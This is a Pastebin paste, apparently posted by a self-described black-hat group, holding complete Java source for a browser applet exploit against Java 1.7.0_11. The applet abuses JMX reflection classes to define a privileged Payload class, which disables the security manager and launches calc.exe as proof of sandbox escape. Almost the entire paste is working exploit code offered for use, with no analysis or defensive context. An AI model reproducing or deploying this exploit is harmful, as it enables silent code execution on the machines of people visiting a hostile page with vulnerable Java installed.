gabby

ngetes doank =))

Feb 20th, 2013
124
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /*
  2. * (Java 1.7.0_11 Exploit)
  3. *
  4. * Ngetes doank :v
  5. *
  6. * http://www.facebook.com/Gabby.IndoNesian.BlackHat.Team
  7. */
  8. import java.applet.Applet;
  9. import com.sun.jmx.mbeanserver.Introspector;
  10. import com.sun.jmx.mbeanserver.JmxMBeanServer;
  11. import com.sun.jmx.mbeanserver.MBeanInstantiator;
  12. import java.lang.invoke.MethodHandle;
  13. import java.lang.invoke.MethodHandles.Lookup;
  14. import java.lang.invoke.MethodType;
  15. import java.lang.reflect.InvocationTargetException;
  16. import java.lang.reflect.Method;
  17. import javax.management.ReflectionException;
  18. import java.io.*;
  19.  
  20. public class PaunchGift extends Applet
  21. {
  22.  
  23. public void init()
  24. {
  25.  
  26. try
  27. {
  28. int length;
  29. byte[] buffer = new byte[5000];
  30. ByteArrayOutputStream os = new ByteArrayOutputStream();
  31.  
  32. // read in the class file from the jar
  33. InputStream is = getClass().getResourceAsStream("Payload.class");
  34.  
  35. // and write it out to the byte array stream
  36. while( ( length = is.read( buffer ) ) > 0 )
  37. os.write( buffer, 0, length );
  38.  
  39. // convert it to a simple byte array
  40. buffer = os.toByteArray();
  41.  
  42. Class class1 = gimmeClass("sun.org.mozilla.javascript.internal.Context");
  43.  
  44. Method method = getMethod(class1, "enter", true);
  45. Object obj = method.invoke(null, new Object[0]);
  46. Method method1 = getMethod(class1, "createClassLoader", false);
  47. Object obj1 = method1.invoke(obj, new Object[1]);
  48.  
  49. Class class2 = gimmeClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader");
  50. Method method2 = getMethod(class2, "defineClass", false);
  51.  
  52. Class my_class = (Class)method2.invoke(obj1, new Object[] { null, buffer });
  53. my_class.newInstance();
  54. Method m_outSandbox = my_class.getMethod("outSandbox", new Class[0]);
  55. m_outSandbox.invoke(null, new Object[] {});
  56.  
  57. }
  58. catch (Throwable localThrowable){}
  59.  
  60. }
  61.  
  62.  
  63. private Method getMethod(Class class1, String s, boolean flag)
  64. {
  65. try {
  66. Method[] amethod = (Method[])Introspector.elementFromComplex(class1, "declaredMethods");
  67. Method[] amethod1 = amethod;
  68.  
  69. for (int i = 0; i < amethod1.length; i++) {
  70. Method method = amethod1[i];
  71. String s1 = method.getName();
  72. Class[] aclass = method.getParameterTypes();
  73. if ((s1 == s) && ((!flag) || (aclass.length == 0))) return method;
  74. }
  75. } catch (Exception localException) { }
  76.  
  77. return null;
  78. }
  79.  
  80. private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException
  81. {
  82. Object obj = null;
  83. JmxMBeanServer jmxmbeanserver = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true);
  84. MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator();
  85.  
  86. Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator");
  87. Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class });
  88. return (Class)method.invoke(mbeaninstantiator, new Object[] { s, obj });
  89. }
  90.  
  91. }
  92.  
  93. ###############################################
  94. import java.lang.reflect.Method;
  95. import java.security.AccessController;
  96. import java.security.PrivilegedExceptionAction;
  97.  
  98. public class Payload implements PrivilegedExceptionAction
  99. {
  100.  
  101. public Payload()
  102. {
  103. try
  104. {
  105. AccessController.doPrivileged(this);
  106. }
  107. catch(Exception exception) { }
  108. }
  109.  
  110. public Object run() throws Exception
  111. {
  112. Class cl = System.class;
  113. Method m = cl.getMethod("setSecurityManager", new Class[] { SecurityManager.class });
  114. m.invoke(null, new Object[1]);
  115. return null;
  116. }
  117.  
  118. public static void outSandbox() throws Exception
  119. {
  120. Runtime.getRuntime().exec("calc.exe");
  121. }
  122. }
RAW Paste Data